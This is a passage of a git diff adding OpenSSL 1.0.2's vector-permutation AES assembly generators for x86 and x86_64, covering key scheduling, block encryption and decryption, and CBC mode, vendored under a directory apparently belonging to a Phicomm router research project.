+	&movdqa	("xmm3","xmm5");		# 3 : 1/jak
+	&pshufb	("xmm3","xmm4");		# 3 = 1/jak
+	&pxor	("xmm3","xmm1");		# 3 = jo
+	&movdqa	("xmm4",&QWP($k_sb1,$const));	# 4 : sbou
+	&pshufb	("xmm4","xmm2");		# 4 = sbou
+	&movdqa	("xmm0",&QWP($k_sb1+16,$const));# 0 : sbot
+	&pshufb	("xmm0","xmm3");		# 0 = sb1t
+	&pxor	("xmm0","xmm4");		# 0 = sbox output
+
+	# add in smeared stuff
+	&pxor	("xmm0","xmm7");
+	&movdqa	("xmm7","xmm0");
+	&ret	();
+&function_end_B("_vpaes_schedule_round");
+
+##
+##  .aes_schedule_transform
+##
+##  Linear-transform %xmm0 according to tables at (%ebx)
+##
+##  Output in %xmm0
+##  Clobbers %xmm1, %xmm2
+##
+&function_begin_B("_vpaes_schedule_transform");
+	&movdqa	("xmm2",&QWP($k_s0F,$const));
+	&movdqa	("xmm1","xmm2");
+	&pandn	("xmm1","xmm0");
+	&psrld	("xmm1",4);
+	&pand	("xmm0","xmm2");
+	&movdqa	("xmm2",&QWP(0,$base));
+	&pshufb	("xmm2","xmm0");
+	&movdqa	("xmm0",&QWP(16,$base));
+	&pshufb	("xmm0","xmm1");
+	&pxor	("xmm0","xmm2");
+	&ret	();
+&function_end_B("_vpaes_schedule_transform");
+
+##
+##  .aes_schedule_mangle
+##
+##  Mangle xmm0 from (basis-transformed) standard version
+##  to our version.
+##
+##  On encrypt,
+##    xor with 0x63
+##    multiply by circulant 0,1,1,1
+##    apply shiftrows transform
+##
+##  On decrypt,
+##    xor with 0x63
+##    multiply by "inverse mixcolumns" circulant E,B,D,9
+##    deskew
+##    apply shiftrows transform
+##
+##
+##  Writes out to (%edx), and increments or decrements it
+##  Keeps track of round number mod 4 in %ecx
+##  Preserves xmm0
+##  Clobbers xmm1-xmm5
+##
+&function_begin_B("_vpaes_schedule_mangle");
+	&movdqa	("xmm4","xmm0");	# save xmm0 for later
+	&movdqa	("xmm5",&QWP($k_mc_forward,$const));
+	&test	($out,$out);
+	&jnz	(&label("schedule_mangle_dec"));
+
+	# encrypting
+	&add	($key,16);
+	&pxor	("xmm4",&QWP($k_s63,$const));
+	&pshufb	("xmm4","xmm5");
+	&movdqa	("xmm3","xmm4");
+	&pshufb	("xmm4","xmm5");
+	&pxor	("xmm3","xmm4");
+	&pshufb	("xmm4","xmm5");
+	&pxor	("xmm3","xmm4");
+
+	&jmp	(&label("schedule_mangle_both"));
+
+&set_label("schedule_mangle_dec",16);
+	# inverse mix columns
+	&movdqa	("xmm2",&QWP($k_s0F,$const));
+	&lea	($inp,&DWP($k_dksd,$const));
+	&movdqa	("xmm1","xmm2");
+	&pandn	("xmm1","xmm4");
+	&psrld	("xmm1",4);			# 1 = hi
+	&pand	("xmm4","xmm2");		# 4 = lo
+
+	&movdqa	("xmm2",&QWP(0,$inp));
+	&pshufb	("xmm2","xmm4");
+	&movdqa	("xmm3",&QWP(0x10,$inp));
+	&pshufb	("xmm3","xmm1");
+	&pxor	("xmm3","xmm2");
+	&pshufb	("xmm3","xmm5");
+
+	&movdqa	("xmm2",&QWP(0x20,$inp));
+	&pshufb	("xmm2","xmm4");
+	&pxor	("xmm2","xmm3");
+	&movdqa	("xmm3",&QWP(0x30,$inp));
+	&pshufb	("xmm3","xmm1");
+	&pxor	("xmm3","xmm2");
+	&pshufb	("xmm3","xmm5");
+
+	&movdqa	("xmm2",&QWP(0x40,$inp));
+	&pshufb	("xmm2","xmm4");
+	&pxor	("xmm2","xmm3");
+	&movdqa	("xmm3",&QWP(0x50,$inp));
+	&pshufb	("xmm3","xmm1");
+	&pxor	("xmm3","xmm2");
+	&pshufb	("xmm3","xmm5");
+
+	&movdqa	("xmm2",&QWP(0x60,$inp));
+	&pshufb	("xmm2","xmm4");
+	&pxor	("xmm2","xmm3");
+	&movdqa	("xmm3",&QWP(0x70,$inp));
+	&pshufb	("xmm3","xmm1");
+	&pxor	("xmm3","xmm2");
+
+	&add	($key,-16);
+
+&set_label("schedule_mangle_both");
+	&movdqa	("xmm1",&QWP($k_sr,$const,$magic));
+	&pshufb	("xmm3","xmm1");
+	&add	($magic,-16);
+	&and	($magic,0x30);
+	&movdqu	(&QWP(0,$key),"xmm3");
+	&ret	();
+&function_end_B("_vpaes_schedule_mangle");
+
+#
+# Interface to OpenSSL
+#
+&function_begin("${PREFIX}_set_encrypt_key");
+	&mov	($inp,&wparam(0));		# inp
+	&lea	($base,&DWP(-56,"esp"));
+	&mov	($round,&wparam(1));		# bits
+	&and	($base,-16);
+	&mov	($key,&wparam(2));		# key
+	&xchg	($base,"esp");			# alloca
+	&mov	(&DWP(48,"esp"),$base);
+
+	&mov	($base,$round);
+	&shr	($base,5);
+	&add	($base,5);
+	&mov	(&DWP(240,$key),$base);		# AES_KEY->rounds = nbits/32+5;
+	&mov	($magic,0x30);
+	&mov	($out,0);
+
+	&lea	($const,&DWP(&label("_vpaes_consts")."+0x30-".&label("pic_point")));
+	&call	("_vpaes_schedule_core");
+&set_label("pic_point");
+
+	&mov	("esp",&DWP(48,"esp"));
+	&xor	("eax","eax");
+&function_end("${PREFIX}_set_encrypt_key");
+
+&function_begin("${PREFIX}_set_decrypt_key");
+	&mov	($inp,&wparam(0));		# inp
+	&lea	($base,&DWP(-56,"esp"));
+	&mov	($round,&wparam(1));		# bits
+	&and	($base,-16);
+	&mov	($key,&wparam(2));		# key
+	&xchg	($base,"esp");			# alloca
+	&mov	(&DWP(48,"esp"),$base);
+
+	&mov	($base,$round);
+	&shr	($base,5);
+	&add	($base,5);
+	&mov	(&DWP(240,$key),$base);	# AES_KEY->rounds = nbits/32+5;
+	&shl	($base,4);
+	&lea	($key,&DWP(16,$key,$base));
+
+	&mov	($out,1);
+	&mov	($magic,$round);
+	&shr	($magic,1);
+	&and	($magic,32);
+	&xor	($magic,32);			# nbist==192?0:32;
+
+	&lea	($const,&DWP(&label("_vpaes_consts")."+0x30-".&label("pic_point")));
+	&call	("_vpaes_schedule_core");
+&set_label("pic_point");
+
+	&mov	("esp",&DWP(48,"esp"));
+	&xor	("eax","eax");
+&function_end("${PREFIX}_set_decrypt_key");
+
+&function_begin("${PREFIX}_encrypt");
+	&lea	($const,&DWP(&label("_vpaes_consts")."+0x30-".&label("pic_point")));
+	&call	("_vpaes_preheat");
+&set_label("pic_point");
+	&mov	($inp,&wparam(0));		# inp
+	&lea	($base,&DWP(-56,"esp"));
+	&mov	($out,&wparam(1));		# out
+	&and	($base,-16);
+	&mov	($key,&wparam(2));		# key
+	&xchg	($base,"esp");			# alloca
+	&mov	(&DWP(48,"esp"),$base);
+
+	&movdqu	("xmm0",&QWP(0,$inp));
+	&call	("_vpaes_encrypt_core");
+	&movdqu	(&QWP(0,$out),"xmm0");
+
+	&mov	("esp",&DWP(48,"esp"));
+&function_end("${PREFIX}_encrypt");
+
+&function_begin("${PREFIX}_decrypt");
+	&lea	($const,&DWP(&label("_vpaes_consts")."+0x30-".&label("pic_point")));
+	&call	("_vpaes_preheat");
+&set_label("pic_point");
+	&mov	($inp,&wparam(0));		# inp
+	&lea	($base,&DWP(-56,"esp"));
+	&mov	($out,&wparam(1));		# out
+	&and	($base,-16);
+	&mov	($key,&wparam(2));		# key
+	&xchg	($base,"esp");			# alloca
+	&mov	(&DWP(48,"esp"),$base);
+
+	&movdqu	("xmm0",&QWP(0,$inp));
+	&call	("_vpaes_decrypt_core");
+	&movdqu	(&QWP(0,$out),"xmm0");
+
+	&mov	("esp",&DWP(48,"esp"));
+&function_end("${PREFIX}_decrypt");
+
+&function_begin("${PREFIX}_cbc_encrypt");
+	&mov	($inp,&wparam(0));		# inp
+	&mov	($out,&wparam(1));		# out
+	&mov	($round,&wparam(2));		# len
+	&mov	($key,&wparam(3));		# key
+	&sub	($round,16);
+	&jc	(&label("cbc_abort"));
+	&lea	($base,&DWP(-56,"esp"));
+	&mov	($const,&wparam(4));		# ivp
+	&and	($base,-16);
+	&mov	($magic,&wparam(5));		# enc
+	&xchg	($base,"esp");			# alloca
+	&movdqu	("xmm1",&QWP(0,$const));	# load IV
+	&sub	($out,$inp);
+	&mov	(&DWP(48,"esp"),$base);
+
+	&mov	(&DWP(0,"esp"),$out);		# save out
+	&mov	(&DWP(4,"esp"),$key)		# save key
+	&mov	(&DWP(8,"esp"),$const);		# save ivp
+	&mov	($out,$round);			# $out works as $len
+
+	&lea	($const,&DWP(&label("_vpaes_consts")."+0x30-".&label("pic_point")));
+	&call	("_vpaes_preheat");
+&set_label("pic_point");
+	&cmp	($magic,0);
+	&je	(&label("cbc_dec_loop"));
+	&jmp	(&label("cbc_enc_loop"));
+
+&set_label("cbc_enc_loop",16);
+	&movdqu	("xmm0",&QWP(0,$inp));		# load input
+	&pxor	("xmm0","xmm1");		# inp^=iv
+	&call	("_vpaes_encrypt_core");
+	&mov	($base,&DWP(0,"esp"));		# restore out
+	&mov	($key,&DWP(4,"esp"));		# restore key
+	&movdqa	("xmm1","xmm0");
+	&movdqu	(&QWP(0,$base,$inp),"xmm0");	# write output
+	&lea	($inp,&DWP(16,$inp));
+	&sub	($out,16);
+	&jnc	(&label("cbc_enc_loop"));
+	&jmp	(&label("cbc_done"));
+
+&set_label("cbc_dec_loop",16);
+	&movdqu	("xmm0",&QWP(0,$inp));		# load input
+	&movdqa	(&QWP(16,"esp"),"xmm1");	# save IV
+	&movdqa	(&QWP(32,"esp"),"xmm0");	# save future IV
+	&call	("_vpaes_decrypt_core");
+	&mov	($base,&DWP(0,"esp"));		# restore out
+	&mov	($key,&DWP(4,"esp"));		# restore key
+	&pxor	("xmm0",&QWP(16,"esp"));	# out^=iv
+	&movdqa	("xmm1",&QWP(32,"esp"));	# load next IV
+	&movdqu	(&QWP(0,$base,$inp),"xmm0");	# write output
+	&lea	($inp,&DWP(16,$inp));
+	&sub	($out,16);
+	&jnc	(&label("cbc_dec_loop"));
+
+&set_label("cbc_done");
+	&mov	($base,&DWP(8,"esp"));		# restore ivp
+	&mov	("esp",&DWP(48,"esp"));
+	&movdqu	(&QWP(0,$base),"xmm1");		# write IV
+&set_label("cbc_abort");
+&function_end("${PREFIX}_cbc_encrypt");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86_64.pl
new file mode 100644
index 0000000..f2ef318
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86_64.pl
@@ -0,0 +1,1207 @@
+#!/usr/bin/env perl
+
+######################################################################
+## Constant-time SSSE3 AES core implementation.
+## version 0.1
+##
+## By Mike Hamburg (Stanford University), 2009
+## Public domain.
+##
+## For details see http://shiftleft.org/papers/vector_aes/ and
+## http://crypto.stanford.edu/vpaes/.
+
+######################################################################
+# September 2011.
+#
+# Interface to OpenSSL as "almost" drop-in replacement for
+# aes-x86_64.pl. "Almost" refers to the fact that AES_cbc_encrypt
+# doesn't handle partial vectors (doesn't have to if called from
+# EVP only). "Drop-in" implies that this module doesn't share key
+# schedule structure with the original nor does it make assumption
+# about its alignment...
+#
+# Performance summary. aes-x86_64.pl column lists large-block CBC
+# encrypt/decrypt/with-hyper-threading-off(*) results in cycles per
+# byte processed with 128-bit key, and vpaes-x86_64.pl column -
+# [also large-block CBC] encrypt/decrypt.
+#
+#		aes-x86_64.pl		vpaes-x86_64.pl
+#
+# Core 2(**)	29.6/41.1/14.3		21.9/25.2(***)
+# Nehalem	29.6/40.3/14.6		10.0/11.8
+# Atom		57.3/74.2/32.1		60.9/77.2(***)
+# Silvermont	52.7/64.0/19.5		48.8/60.8(***)
+#
+# (*)	"Hyper-threading" in the context refers rather to cache shared
+#	among multiple cores, than to specifically Intel HTT. As vast
+#	majority of contemporary cores share cache, slower code path
+#	is common place. In other words "with-hyper-threading-off"
+#	results are presented mostly for reference purposes.
+#
+# (**)	"Core 2" refers to initial 65nm design, a.k.a. Conroe.
+#
+# (***)	Less impressive improvement on Core 2 and Atom is due to slow
+#	pshufb,	yet it's respectable +36%/62% improvement on Core 2
+#	(as implied, over "hyper-threading-safe" code path).
+#
+#						<appro@openssl.org>
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$PREFIX="vpaes";
+
+$code.=<<___;
+.text
+
+##
+##  _aes_encrypt_core
+##
+##  AES-encrypt %xmm0.
+##
+##  Inputs:
+##     %xmm0 = input
+##     %xmm9-%xmm15 as in _vpaes_preheat
+##    (%rdx) = scheduled keys
+##
+##  Output in %xmm0
+##  Clobbers  %xmm1-%xmm5, %r9, %r10, %r11, %rax
+##  Preserves %xmm6 - %xmm8 so you get some local vectors
+##
+##
+.type	_vpaes_encrypt_core,\@abi-omnipotent
+.align 16
+_vpaes_encrypt_core:
+	mov	%rdx,	%r9
+	mov	\$16,	%r11
+	mov	240(%rdx),%eax
+	movdqa	%xmm9,	%xmm1
+	movdqa	.Lk_ipt(%rip), %xmm2	# iptlo
+	pandn	%xmm0,	%xmm1
+	movdqu	(%r9),	%xmm5		# round0 key
+	psrld	\$4,	%xmm1
+	pand	%xmm9,	%xmm0
+	pshufb	%xmm0,	%xmm2
+	movdqa	.Lk_ipt+16(%rip), %xmm0	# ipthi
+	pshufb	%xmm1,	%xmm0
+	pxor	%xmm5,	%xmm2
+	add	\$16,	%r9
+	pxor	%xmm2,	%xmm0
+	lea	.Lk_mc_backward(%rip),%r10
+	jmp	.Lenc_entry
+
+.align 16
+.Lenc_loop:
+	# middle of middle round
+	movdqa  %xmm13,	%xmm4	# 4 : sb1u
+	movdqa  %xmm12,	%xmm0	# 0 : sb1t
+	pshufb  %xmm2,	%xmm4	# 4 = sb1u
+	pshufb  %xmm3,	%xmm0	# 0 = sb1t
+	pxor	%xmm5,	%xmm4	# 4 = sb1u + k
+	movdqa  %xmm15,	%xmm5	# 4 : sb2u
+	pxor	%xmm4,	%xmm0	# 0 = A
+	movdqa	-0x40(%r11,%r10), %xmm1		# .Lk_mc_forward[]
+	pshufb	%xmm2,	%xmm5	# 4 = sb2u
+	movdqa	(%r11,%r10), %xmm4		# .Lk_mc_backward[]
+	movdqa	%xmm14, %xmm2	# 2 : sb2t
+	pshufb	%xmm3,  %xmm2	# 2 = sb2t
+	movdqa	%xmm0,  %xmm3	# 3 = A
+	pxor	%xmm5,	%xmm2	# 2 = 2A
+	pshufb  %xmm1,  %xmm0	# 0 = B
+	add	\$16,	%r9	# next key
+	pxor	%xmm2,  %xmm0	# 0 = 2A+B
+	pshufb	%xmm4,	%xmm3	# 3 = D
+	add	\$16,	%r11	# next mc
+	pxor	%xmm0,	%xmm3	# 3 = 2A+B+D
+	pshufb  %xmm1,	%xmm0	# 0 = 2B+C
+	and	\$0x30,	%r11	# ... mod 4
+	sub	\$1,%rax	# nr--
+	pxor	%xmm3,	%xmm0	# 0 = 2A+3B+C+D
+
+.Lenc_entry:
+	# top of round
+	movdqa  %xmm9, 	%xmm1	# 1 : i
+	movdqa	%xmm11, %xmm5	# 2 : a/k
+	pandn	%xmm0, 	%xmm1	# 1 = i<<4
+	psrld	\$4,   	%xmm1   # 1 = i
+	pand	%xmm9, 	%xmm0   # 0 = k
+	pshufb  %xmm0,  %xmm5	# 2 = a/k
+	movdqa	%xmm10,	%xmm3  	# 3 : 1/i
+	pxor	%xmm1,	%xmm0	# 0 = j
+	pshufb  %xmm1, 	%xmm3  	# 3 = 1/i
+	movdqa	%xmm10,	%xmm4  	# 4 : 1/j
+	pxor	%xmm5, 	%xmm3  	# 3 = iak = 1/i + a/k
+	pshufb	%xmm0, 	%xmm4  	# 4 = 1/j
+	movdqa	%xmm10,	%xmm2  	# 2 : 1/iak
+	pxor	%xmm5, 	%xmm4  	# 4 = jak = 1/j + a/k
+	pshufb  %xmm3,	%xmm2  	# 2 = 1/iak
+	movdqa	%xmm10, %xmm3   # 3 : 1/jak
+	pxor	%xmm0, 	%xmm2  	# 2 = io
+	pshufb  %xmm4,  %xmm3   # 3 = 1/jak
+	movdqu	(%r9),	%xmm5
+	pxor	%xmm1,  %xmm3   # 3 = jo
+	jnz	.Lenc_loop
+
+	# middle of last round
+	movdqa	-0x60(%r10), %xmm4	# 3 : sbou	.Lk_sbo
+	movdqa	-0x50(%r10), %xmm0	# 0 : sbot	.Lk_sbo+16
+	pshufb  %xmm2,  %xmm4	# 4 = sbou
+	pxor	%xmm5,  %xmm4	# 4 = sb1u + k
+	pshufb  %xmm3,	%xmm0	# 0 = sb1t
+	movdqa	0x40(%r11,%r10), %xmm1		# .Lk_sr[]
+	pxor	%xmm4,	%xmm0	# 0 = A
+	pshufb	%xmm1,	%xmm0
+	ret
+.size	_vpaes_encrypt_core,.-_vpaes_encrypt_core
+	
+##
+##  Decryption core
+##
+##  Same API as encryption core.
+##
+.type	_vpaes_decrypt_core,\@abi-omnipotent
+.align	16
+_vpaes_decrypt_core:
+	mov	%rdx,	%r9		# load key
+	mov	240(%rdx),%eax
+	movdqa	%xmm9,	%xmm1
+	movdqa	.Lk_dipt(%rip), %xmm2	# iptlo
+	pandn	%xmm0,	%xmm1
+	mov	%rax,	%r11
+	psrld	\$4,	%xmm1
+	movdqu	(%r9),	%xmm5		# round0 key
+	shl	\$4,	%r11
+	pand	%xmm9,	%xmm0
+	pshufb	%xmm0,	%xmm2
+	movdqa	.Lk_dipt+16(%rip), %xmm0 # ipthi
+	xor	\$0x30,	%r11
+	lea	.Lk_dsbd(%rip),%r10
+	pshufb	%xmm1,	%xmm0
+	and	\$0x30,	%r11
+	pxor	%xmm5,	%xmm2
+	movdqa	.Lk_mc_forward+48(%rip), %xmm5
+	pxor	%xmm2,	%xmm0
+	add	\$16,	%r9
+	add	%r10,	%r11
+	jmp	.Ldec_entry
+
+.align 16
+.Ldec_loop:
+##
+##  Inverse mix columns
+##
+	movdqa  -0x20(%r10),%xmm4	# 4 : sb9u
+	movdqa  -0x10(%r10),%xmm1	# 0 : sb9t
+	pshufb	%xmm2,	%xmm4		# 4 = sb9u
+	pshufb	%xmm3,	%xmm1		# 0 = sb9t
+	pxor	%xmm4,	%xmm0
+	movdqa  0x00(%r10),%xmm4	# 4 : sbdu
+	pxor	%xmm1,	%xmm0		# 0 = ch
+	movdqa  0x10(%r10),%xmm1	# 0 : sbdt
+
+	pshufb	%xmm2,	%xmm4		# 4 = sbdu
+	pshufb	%xmm5,	%xmm0		# MC ch
+	pshufb	%xmm3,	%xmm1		# 0 = sbdt
+	pxor	%xmm4,	%xmm0		# 4 = ch
+	movdqa  0x20(%r10),%xmm4	# 4 : sbbu
+	pxor	%xmm1,	%xmm0		# 0 = ch
+	movdqa  0x30(%r10),%xmm1	# 0 : sbbt
+
+	pshufb	%xmm2,	%xmm4		# 4 = sbbu
+	pshufb	%xmm5,	%xmm0		# MC ch
+	pshufb	%xmm3,	%xmm1		# 0 = sbbt
+	pxor	%xmm4,	%xmm0		# 4 = ch
+	movdqa  0x40(%r10),%xmm4	# 4 : sbeu
+	pxor	%xmm1,	%xmm0		# 0 = ch
+	movdqa  0x50(%r10),%xmm1	# 0 : sbet
+
+	pshufb	%xmm2,	%xmm4		# 4 = sbeu
+	pshufb	%xmm5,	%xmm0		# MC ch
+	pshufb	%xmm3,	%xmm1		# 0 = sbet
+	pxor	%xmm4,	%xmm0		# 4 = ch
+	add	\$16, %r9		# next round key
+	palignr	\$12,	%xmm5,	%xmm5
+	pxor	%xmm1,	%xmm0		# 0 = ch
+	sub	\$1,%rax		# nr--
+
+.Ldec_entry:
+	# top of round
+	movdqa  %xmm9, 	%xmm1	# 1 : i
+	pandn	%xmm0, 	%xmm1	# 1 = i<<4
+	movdqa	%xmm11, %xmm2	# 2 : a/k
+	psrld	\$4,    %xmm1	# 1 = i
+	pand	%xmm9, 	%xmm0	# 0 = k
+	pshufb  %xmm0,  %xmm2	# 2 = a/k
+	movdqa	%xmm10,	%xmm3	# 3 : 1/i
+	pxor	%xmm1,	%xmm0	# 0 = j
+	pshufb  %xmm1, 	%xmm3	# 3 = 1/i
+	movdqa	%xmm10,	%xmm4	# 4 : 1/j
+	pxor	%xmm2, 	%xmm3	# 3 = iak = 1/i + a/k
+	pshufb	%xmm0, 	%xmm4	# 4 = 1/j
+	pxor	%xmm2, 	%xmm4	# 4 = jak = 1/j + a/k
+	movdqa	%xmm10,	%xmm2	# 2 : 1/iak
+	pshufb  %xmm3,	%xmm2	# 2 = 1/iak
+	movdqa	%xmm10, %xmm3	# 3 : 1/jak
+	pxor	%xmm0, 	%xmm2	# 2 = io
+	pshufb  %xmm4,  %xmm3	# 3 = 1/jak
+	movdqu	(%r9),	%xmm0
+	pxor	%xmm1,  %xmm3	# 3 = jo
+	jnz	.Ldec_loop
+
+	# middle of last round
+	movdqa	0x60(%r10), %xmm4	# 3 : sbou
+	pshufb  %xmm2,  %xmm4	# 4 = sbou
+	pxor	%xmm0,  %xmm4	# 4 = sb1u + k
+	movdqa	0x70(%r10), %xmm0	# 0 : sbot
+	movdqa	-0x160(%r11), %xmm2	# .Lk_sr-.Lk_dsbd=-0x160
+	pshufb  %xmm3,	%xmm0	# 0 = sb1t
+	pxor	%xmm4,	%xmm0	# 0 = A
+	pshufb	%xmm2,	%xmm0
+	ret
+.size	_vpaes_decrypt_core,.-_vpaes_decrypt_core
+
+########################################################
+##                                                    ##
+##                  AES key schedule                  ##
+##                                                    ##
+########################################################
+.type	_vpaes_schedule_core,\@abi-omnipotent
+.align	16
+_vpaes_schedule_core:
+	# rdi = key
+	# rsi = size in bits
+	# rdx = buffer
+	# rcx = direction.  0=encrypt, 1=decrypt
+
+	call	_vpaes_preheat		# load the tables
+	movdqa	.Lk_rcon(%rip), %xmm8	# load rcon
+	movdqu	(%rdi),	%xmm0		# load key (unaligned)
+
+	# input transform
+	movdqa	%xmm0,	%xmm3
+	lea	.Lk_ipt(%rip), %r11
+	call	_vpaes_schedule_transform
+	movdqa	%xmm0,	%xmm7
+
+	lea	.Lk_sr(%rip),%r10
+	test	%rcx,	%rcx
+	jnz	.Lschedule_am_decrypting
+
+	# encrypting, output zeroth round key after transform
+	movdqu	%xmm0,	(%rdx)
+	jmp	.Lschedule_go
+
+.Lschedule_am_decrypting:
+	# decrypting, output zeroth round key after shiftrows
+	movdqa	(%r8,%r10),%xmm1
+	pshufb  %xmm1,	%xmm3
+	movdqu	%xmm3,	(%rdx)
+	xor	\$0x30, %r8
+
+.Lschedule_go:
+	cmp	\$192,	%esi
+	ja	.Lschedule_256
+	je	.Lschedule_192
+	# 128: fall though
+
+##
+##  .schedule_128
+##
+##  128-bit specific part of key schedule.
+##
+##  This schedule is really simple, because all its parts
+##  are accomplished by the subroutines.
+##
+.Lschedule_128:
+	mov	\$10, %esi
+	
+.Loop_schedule_128:
+	call 	_vpaes_schedule_round
+	dec	%rsi
+	jz 	.Lschedule_mangle_last
+	call	_vpaes_schedule_mangle	# write output
+	jmp 	.Loop_schedule_128
+
+##
+##  .aes_schedule_192
+##
+##  192-bit specific part of key schedule.
+##
+##  The main body of this schedule is the same as the 128-bit
+##  schedule, but with more smearing.  The long, high side is
+##  stored in %xmm7 as before, and the short, low side is in
+##  the high bits of %xmm6.
+##
+##  This schedule is somewhat nastier, however, because each
+##  round produces 192 bits of key material, or 1.5 round keys.
+##  Therefore, on each cycle we do 2 rounds and produce 3 round
+##  keys.
+##
+.align	16
+.Lschedule_192:
+	movdqu	8(%rdi),%xmm0		# load key part 2 (very unaligned)
+	call	_vpaes_schedule_transform	# input transform
+	movdqa	%xmm0,	%xmm6		# save short part
+	pxor	%xmm4,	%xmm4		# clear 4
+	movhlps	%xmm4,	%xmm6		# clobber low side with zeros
+	mov	\$4,	%esi
+
+.Loop_schedule_192:
+	call	_vpaes_schedule_round
+	palignr	\$8,%xmm6,%xmm0	
+	call	_vpaes_schedule_mangle	# save key n
+	call	_vpaes_schedule_192_smear
+	call	_vpaes_schedule_mangle	# save key n+1
+	call	_vpaes_schedule_round
+	dec	%rsi
+	jz 	.Lschedule_mangle_last
+	call	_vpaes_schedule_mangle	# save key n+2
+	call	_vpaes_schedule_192_smear
+	jmp	.Loop_schedule_192
+
+##
+##  .aes_schedule_256
+##
+##  256-bit specific part of key schedule.
+##
+##  The structure here is very similar to the 128-bit
+##  schedule, but with an additional "low side" in
+##  %xmm6.  The low side's rounds are the same as the
+##  high side's, except no rcon and no rotation.
+##
+.align	16
+.Lschedule_256:
+	movdqu	16(%rdi),%xmm0		# load key part 2 (unaligned)
+	call	_vpaes_schedule_transform	# input transform
+	mov	\$7, %esi
+	
+.Loop_schedule_256:
+	call	_vpaes_schedule_mangle	# output low result
+	movdqa	%xmm0,	%xmm6		# save cur_lo in xmm6
+
+	# high round
+	call	_vpaes_schedule_round
+	dec	%rsi
+	jz 	.Lschedule_mangle_last
+	call	_vpaes_schedule_mangle	
+
+	# low round. swap xmm7 and xmm6
+	pshufd	\$0xFF,	%xmm0,	%xmm0
+	movdqa	%xmm7,	%xmm5
+	movdqa	%xmm6,	%xmm7
+	call	_vpaes_schedule_low_round
+	movdqa	%xmm5,	%xmm7
+	
+	jmp	.Loop_schedule_256
+
+	
+##
+##  .aes_schedule_mangle_last
+##
+##  Mangler for last round of key schedule
+##  Mangles %xmm0
+##    when encrypting, outputs out(%xmm0) ^ 63
+##    when decrypting, outputs unskew(%xmm0)
+##
+##  Always called right before return... jumps to cleanup and exits
+##
+.align	16
+.Lschedule_mangle_last:
+	# schedule last round key from xmm0
+	lea	.Lk_deskew(%rip),%r11	# prepare to deskew
+	test	%rcx, 	%rcx
+	jnz	.Lschedule_mangle_last_dec
+
+	# encrypting
+	movdqa	(%r8,%r10),%xmm1
+	pshufb	%xmm1,	%xmm0		# output permute
+	lea	.Lk_opt(%rip),	%r11	# prepare to output transform
+	add	\$32,	%rdx
+
+.Lschedule_mangle_last_dec:
+	add	\$-16,	%rdx
+	pxor	.Lk_s63(%rip),	%xmm0
+	call	_vpaes_schedule_transform # output transform
+	movdqu	%xmm0,	(%rdx)		# save last key
+
+	# cleanup
+	pxor	%xmm0,  %xmm0
+	pxor	%xmm1,  %xmm1
+	pxor	%xmm2,  %xmm2
+	pxor	%xmm3,  %xmm3
+	pxor	%xmm4,  %xmm4
+	pxor	%xmm5,  %xmm5
+	pxor	%xmm6,  %xmm6
+	pxor	%xmm7,  %xmm7
+	ret
+.size	_vpaes_schedule_core,.-_vpaes_schedule_core
+
+##
+##  .aes_schedule_192_smear
+##
+##  Smear the short, low side in the 192-bit key schedule.
+##
+##  Inputs:
+##    %xmm7: high side, b  a  x  y
+##    %xmm6:  low side, d  c  0  0
+##    %xmm13: 0
+##
+##  Outputs:
+##    %xmm6: b+c+d  b+c  0  0
+##    %xmm0: b+c+d  b+c  b  a
+##
+.type	_vpaes_schedule_192_smear,\@abi-omnipotent
+.align	16
+_vpaes_schedule_192_smear:
+	pshufd	\$0x80,	%xmm6,	%xmm1	# d c 0 0 -> c 0 0 0
+	pshufd	\$0xFE,	%xmm7,	%xmm0	# b a _ _ -> b b b a
+	pxor	%xmm1,	%xmm6		# -> c+d c 0 0
+	pxor	%xmm1,	%xmm1
+	pxor	%xmm0,	%xmm6		# -> b+c+d b+c b a
+	movdqa	%xmm6,	%xmm0
+	movhlps	%xmm1,	%xmm6		# clobber low side with zeros
+	ret
+.size	_vpaes_schedule_192_smear,.-_vpaes_schedule_192_smear
+
+##
+##  .aes_schedule_round
+##
+##  Runs one main round of the key schedule on %xmm0, %xmm7
+##
+##  Specifically, runs subbytes on the high dword of %xmm0
+##  then rotates it by one byte and xors into the low dword of
+##  %xmm7.
+##
+##  Adds rcon from low byte of %xmm8, then rotates %xmm8 for
+##  next rcon.
+##
+##  Smears the dwords of %xmm7 by xoring the low into the
+##  second low, result into third, result into highest.
+##
+##  Returns results in %xmm7 = %xmm0.
+##  Clobbers %xmm1-%xmm4, %r11.
+##
+.type	_vpaes_schedule_round,\@abi-omnipotent
+.align	16
+_vpaes_schedule_round:
+	# extract rcon from xmm8
+	pxor	%xmm1,	%xmm1
+	palignr	\$15,	%xmm8,	%xmm1
+	palignr	\$15,	%xmm8,	%xmm8
+	pxor	%xmm1,	%xmm7
+
+	# rotate
+	pshufd	\$0xFF,	%xmm0,	%xmm0
+	palignr	\$1,	%xmm0,	%xmm0
+	
+	# fall through...
+	
+	# low round: same as high round, but no rotation and no rcon.
+_vpaes_schedule_low_round:
+	# smear xmm7
+	movdqa	%xmm7,	%xmm1
+	pslldq	\$4,	%xmm7
+	pxor	%xmm1,	%xmm7
+	movdqa	%xmm7,	%xmm1
+	pslldq	\$8,	%xmm7
+	pxor	%xmm1,	%xmm7
+	pxor	.Lk_s63(%rip), %xmm7
+
+	# subbytes
+	movdqa  %xmm9, 	%xmm1
+	pandn	%xmm0, 	%xmm1
+	psrld	\$4,    %xmm1		# 1 = i
+	pand	%xmm9, 	%xmm0		# 0 = k
+	movdqa	%xmm11, %xmm2		# 2 : a/k
+	pshufb  %xmm0,  %xmm2		# 2 = a/k
+	pxor	%xmm1,	%xmm0		# 0 = j
+	movdqa	%xmm10,	%xmm3		# 3 : 1/i
